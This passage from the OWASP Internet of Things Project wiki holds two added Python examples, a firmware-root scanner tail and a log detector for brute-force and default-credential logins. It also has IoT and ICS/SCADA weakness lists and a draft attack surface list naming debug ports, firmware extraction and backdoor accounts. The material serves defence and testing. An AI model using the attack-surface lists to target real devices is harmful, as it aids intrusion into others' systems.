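        "bin/busybox": b"\x7fELF" + b"\x00" * 64 + b"BusyBox v1.01 (2005)\x00",
    }
    for rel, data in files.items():
        p = Path(base, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
    return base


def demo():
    """Build the sample root in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        return scan_firmware_root(build_sample_root(d))


if __name__ == "__main__":
    for kind, rel, detail in demo():
        print(f"{kind:20} {rel:26} {detail}")
```
<br />
On a real extraction, point scan_firmware_root() at the squashfs-root (or similar) directory that binwalk produced. The uid-0 check only applies to passwd, since the third field of shadow is the last-change date, not a uid; mixing the two formats is a common false-positive source in quick scripts.<br />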
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
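Several of the events above can be derived from ordinary device or gateway logs rather than requiring new instrumentation. The following is an added example of detection logic for a subset of them (failed-password and login-rate thresholds, factory-default credential use, unsupported HTTP methods, honey-trap hits, traffic from unenrolled devices); it is not code from the OWASP IoT project or from AppSensor. It assumes the device emits one JSON object per line with the fields used below; the enrollment list, honey-trap path and thresholds are assumptions, and the log lines are constructed:<br />
<br />
```python
"""Detection logic for a subset of the recommended IoT logging events, run over
constructed device log lines.

Added example, not code from the OWASP IoT project or AppSensor. It assumes the
device or gateway emits one JSON object per line with the fields used below
(ts, event, src, device, user, result, cred, method, path); the enrollment list,
honey-trap path and thresholds are also assumptions.
"""
import json
from collections import defaultdict, deque

ENROLLED_DEVICES = {"dev-0001", "dev-0002"}      # ecosystem membership list
HONEY_PATHS = {"/cgi-bin/admin_backup.cgi"}      # never linked from the real UI
ALLOWED_METHODS = {"GET", "POST", "PUT", "DELETE"}
FAIL_THRESHOLD, FAIL_WINDOW = 5, 300             # failed logins per user / seconds
RATE_THRESHOLD, RATE_WINDOW = 20, 60             # login attempts per source / seconds


def _push(window, ts, span):
    """Append ts and drop entries older than span seconds (sliding window)."""
    window.append(ts)
    while window and ts - window[0] > span:
        window.popleft()


def analyze(lines):
    """Return (category, event, detail) tuples in the order they trigger."""
    events = []
    fails = defaultdict(deque)     # user -> timestamps of failed logins
    attempts = defaultdict(deque)  # src  -> timestamps of all login attempts
    for line in lines:
        rec = json.loads(line)
        ts, src, dev = rec["ts"], rec.get("src"), rec.get("device")
        if dev and dev not in ENROLLED_DEVICES:
            events.append(("Ecosystem Membership Exceptions",
                           "Traffic Seen from Unenrolled System", dev))
        if rec["event"] == "login":
            _push(attempts[src], ts, RATE_WINDOW)
            if len(attempts[src]) == RATE_THRESHOLD:
                events.append(("Authentication Exceptions",
                               "High Rate of Login Attempts", src))
            if rec["result"] != "ok":
                _push(fails[rec["user"]], ts, FAIL_WINDOW)
                if len(fails[rec["user"]]) == FAIL_THRESHOLD:
                    events.append(("Authentication Exceptions",
                                   "Multiple Failed Passwords", rec["user"]))
            elif rec.get("cred") == "factory-default":
                # the device logs whether the accepted credential was a factory
                # default; it never logs the password itself
                events.append(("Administrative Mode Events",
                               "Device Accessed Using Default Administrative Credentials",
                               rec["user"]))
        elif rec["event"] == "http":
            if rec["method"] not in ALLOWED_METHODS:
                events.append(("Request Exceptions",
                               "Attempt to Invoke Unsupported HTTP Method", rec["method"]))
            if rec["path"] in HONEY_PATHS:
                events.append(("Honey Trap Exceptions",
                               "Honey Trap Resource Requested", rec["path"]))
        elif rec["event"] == "admin_mode":
            events.append(("Administrative Mode Events",
                           "Device Entered Administrative Mode", dev))
    return events


def _rec(**fields):
    return json.dumps(fields)


# Constructed sample: 20 failed admin logins from one address inside a minute,
# then a success with the factory default, a TRACE request, a honey-trap hit,
# traffic from a device that was never enrolled, and an admin-mode entry.
SAMPLE_LOG = [
    _rec(ts=t, event="login", src="203.0.113.5", device="dev-0001",
         user="admin", result="fail") for t in range(20)
] + [
    _rec(ts=25, event="login", src="203.0.113.5", device="dev-0001",
         user="admin", result="ok", cred="factory-default"),
    _rec(ts=30, event="http", src="203.0.113.5", device="dev-0001",
         method="TRACE", path="/"),
    _rec(ts=31, event="http", src="203.0.113.5", device="dev-0001",
         method="GET", path="/cgi-bin/admin_backup.cgi"),
    _rec(ts=40, event="http", src="198.51.100.9", device="dev-9999",
         method="GET", path="/api/status"),
    _rec(ts=41, event="admin_mode", src="192.0.2.2", device="dev-0002"),
]


if __name__ == "__main__":
    for category, event, detail in analyze(SAMPLE_LOG):
        print(f"[{category}] {event}: {detail}")
```
<br />
Each threshold fires once when the sliding window reaches it rather than on every subsequent line, which keeps a brute-force burst from producing one alert per attempt. The factory-default event depends on the device recording that fact at authentication time; this is the kind of field that has to be designed into the logging, since it cannot be reconstructed from a generic "login ok" line afterwards.<br />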
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program around IoT devices, and companies that want to build one have few good resources on what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing these mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. It is a cross-industry consortium dedicated to enabling the interoperability of the billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>
<hr />
<p>Aaron.guzman: OWASP Internet of Things Project, earlier revision, 2018-12-23T17:24:07Z (/* OWASP Internet of Things (IoT) Project */)</p>
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT, including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants, whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 10 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Lévy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
